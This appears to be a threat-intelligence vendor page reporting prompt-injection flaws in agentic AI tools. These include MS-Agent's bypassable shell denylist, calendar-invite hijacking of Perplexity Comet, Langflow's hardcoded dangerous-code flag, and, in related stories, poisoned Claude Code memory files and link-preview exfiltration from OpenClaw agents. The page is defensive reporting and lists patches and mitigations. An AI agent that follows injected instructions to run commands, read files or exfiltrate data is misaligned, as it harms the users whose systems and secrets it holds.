Prompt-injection RCE risks in agentic AI tools with OS and browser automation
Security researchers and CERT/CC reporting highlighted critical prompt-injection-to-execution paths in agentic AI systems where untrusted content can be interpreted as instructions and then executed via connected tools. In ModelScope MS-Agent, CVE-2026-2256 (CVSS 9.8) was reported as a command injection / RCE issue tied to the framework’s “Shell tool,” where external input is not properly sanitized before being passed to OS command execution; a check_safe() denylist-based filter was described as bypassable via obfuscation/alternate syntax, enabling arbitrary command execution and potential full host compromise.
Separate research from Zenity Labs described a broader class of agentic AI browser weaknesses (including Perplexity’s Comet) where attackers can hijack autonomous workflows using indirect prompt injection delivered through normal channels such as a calendar invite; prior to patches, this could drive the browser to access local files, read directories/files, and exfiltrate data, and in some cases leverage the agent’s existing authenticated context to interact with sensitive services (including password managers). A similar execution-model risk was reported in Langflow’s CSV Agent as CVE-2026-27966 (CVSS 10.0), where allow_dangerous_code=True was hardcoded, enabling LangChain’s python_repl_ast tool and allowing remote attackers with chat access to coerce server-side code execution and full system compromise via prompt injection.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
7 events from the most recent confirmed update back to the earliest known activity.
No patch available for MS-Agent at disclosure
At the time CVE-2026-2256 was disclosed, no vendor patch or official statement was available for ModelScope MS-Agent. Recommended mitigations included sandboxing, least privilege, validating trusted content, and replacing denylist filtering with allowlists.
CERT/CC discloses critical MS-Agent command execution flaw
CERT/CC disclosed CVE-2026-2256, a critical vulnerability in ModelScope MS-Agent that allows prompt-injection-style inputs to trigger malicious OS commands through the built-in Shell tool. The flaw could lead to remote code execution, data theft, file tampering, persistence, and lateral movement.
Zenity publicly discloses agentic AI browser hijacking research
Zenity Labs publicly disclosed a suite of vulnerabilities in agentic AI browsers, including Perplexity Comet, showing that prompt injection via legitimate calendar invites could lead to file access, data exfiltration, and password manager abuse. The research highlighted weak trust boundaries between user intent and agent execution.
Langflow recommends upgrade to version 1.8.0
Langflow's official security advisory recommended updating to version 1.8.0 to remediate CVE-2026-27966. The update changed the default behavior to prevent automatic execution of dangerous code.
Langflow discloses critical CSV Agent RCE flaw
A critical Langflow AI CSV Agent vulnerability, tracked as CVE-2026-27966 and rated 10.0, was publicly disclosed. The flaw stemmed from the CSV Agent node being hardcoded with allow_dangerous_code=True, enabling prompt injection to trigger Python and OS command execution on the server.
Perplexity fixes Comet AI browser vulnerabilities
Perplexity issued a fix for the reported Comet vulnerabilities in February 2026. The patch addressed issues that previously allowed attacker-controlled content to be treated as user intent and trigger sensitive autonomous actions.
Perplexity notified of agentic AI browser vulnerabilities
Zenity Labs reported multiple prompt-injection vulnerabilities affecting agentic AI browsers, including Perplexity Comet, to Perplexity in 2025. The issues showed that malicious calendar invites and indirect prompts could hijack browser agents, access local files, and abuse connected tools.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
5 references tracked. Mallory keeps watching after this page renders.
Insecure Output Handling: Code Injection Through LLM Output (Part 3) | by Irem Bezci | Apr, 2026 | InfoSec Write-ups
infosecwriteups.com
Open sourcered-run 2.0: Agent Teams - by Kevin O'Riley
blog.blacklanternsecurity.com
Open sourceMS-Agent Vulnerability Let Attackers Hijack AI Agent to Gain Full System Control
cybersecuritynews.com
Open sourceResearchers discover suite of agentic AI browser vulnerabilities | CyberScoop
cyberscoop.com
Open sourceLangflow’s AI CSV Agent Vulnerability Allows Remote Code Execution Attacks
cybersecuritynews.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Prompt Injection Risks in Agentic AI and AI-Powered Browsers
Security researchers reported that **prompt injection** is enabling practical attacks against *agentic AI* systems that have access to tools and user data, and argued the industry is underestimating the threat. A proposed framing, **“promptware,”** describes malicious prompts as a malware-like execution mechanism that can drive an LLM to take actions via its connected tools—potentially leading to **data exfiltration**, cross-system propagation, IoT manipulation, or even **arbitrary code execution**, depending on the permissions and integrations available. Trail of Bits disclosed results from an adversarial security assessment of Perplexity’s *Comet* browser, showing how prompt injection techniques could be used to **extract private information from authenticated sessions (e.g., Gmail)** by abusing the browser’s AI assistant and its tool access (such as reading page content, using browsing history, and interacting with the browser). Their threat-model-driven testing emphasized that agentic assistants can treat external web content as instructions unless it is explicitly handled as **untrusted input**, and they published recommendations intended to reduce prompt-injection-driven data paths between the user’s local trust zone (profiles/cookies/history) and vendor-hosted agent/chat services.
Mar 21, 2026
AI Agent Framework Flaws Turn Prompt Injection Into Code Execution and Persistence
Microsoft disclosed two critical vulnerabilities in its **Semantic Kernel** AI agent framework that could let prompt injection escalate into host compromise. `CVE-2026-26030` affected the Python implementation before version `1.39.4`, where unsafe `eval()`-based lambda construction in the Search Plugin’s default In-Memory Vector Store filter path enabled remote code execution, while `CVE-2026-25592` affected the .NET SDK before version `1.71.0` and allowed arbitrary file write through `SessionsPythonPlugin`’s `DownloadFileAsync`, creating a path to sandbox escape and host takeover; a related arbitrary file read issue was also present in upload handling. Microsoft said it hardened AST validation, restricted callable functions and attributes, removed unintended tool exposure, added path validation, and urged customers to patch and review endpoint telemetry for signs of exploitation. The disclosure lands amid broader warnings that AI agents can preserve and amplify malicious instructions through memory and context reuse. Cisco researchers recently showed that poisoned memory files in Anthropic’s **Claude Code** could persist across projects and sessions, steering the assistant to insert hard-coded secrets, choose insecure packages and configurations, and spread tainted changes to another developer. Researchers and defenders say the incidents reinforce that AI models are not security boundaries and that any model-influenced tool parameter, memory file, or context artifact should be treated as attacker-controlled input, with mitigations including patching vulnerable frameworks, scanning memory and dependency files, and purging stored agent memory after suspected compromise.
May 7, 2026
Indirect Prompt Injection and Data Exfiltration Risks in Enterprise AI Agents
Security researchers warned that **AI agents and retrieval-augmented generation (RAG) systems** can be turned into data-exfiltration channels when attackers poison inputs or embed malicious instructions in content the model is expected to process. One report described a **0-click indirect prompt injection** against *OpenClaw* agents in which hidden instructions cause the agent to generate an attacker-controlled URL containing sensitive data such as API keys or private conversations in query parameters; messaging platforms like *Telegram* or *Discord* can then automatically request that URL for link previews, silently delivering the data to the attacker. The same reporting noted concerns about insecure defaults that allow agents to browse, execute tasks, and access local files, expanding the blast radius of prompt-injection abuse. Related analysis highlighted that the same core weakness extends beyond standalone agents to **enterprise RAG deployments**, where the integrity of the knowledge base becomes part of the security boundary. If attackers can poison indexed documents in systems such as SharePoint or Confluence, they can manipulate retrieval results and influence model outputs, including security workflows and analyst guidance. Broader commentary on **agentic AI threat convergence** reinforced that prompt engineering is no longer just a productivity technique but an emerging exploit class, with adversaries using prompt injection and context manipulation against AI-enabled security operations. Together, the reporting shows that enterprise AI risk increasingly depends on controlling untrusted content, hardening agent permissions, and treating prompts, retrieved documents, and downstream integrations as attack surfaces.
May 7, 2026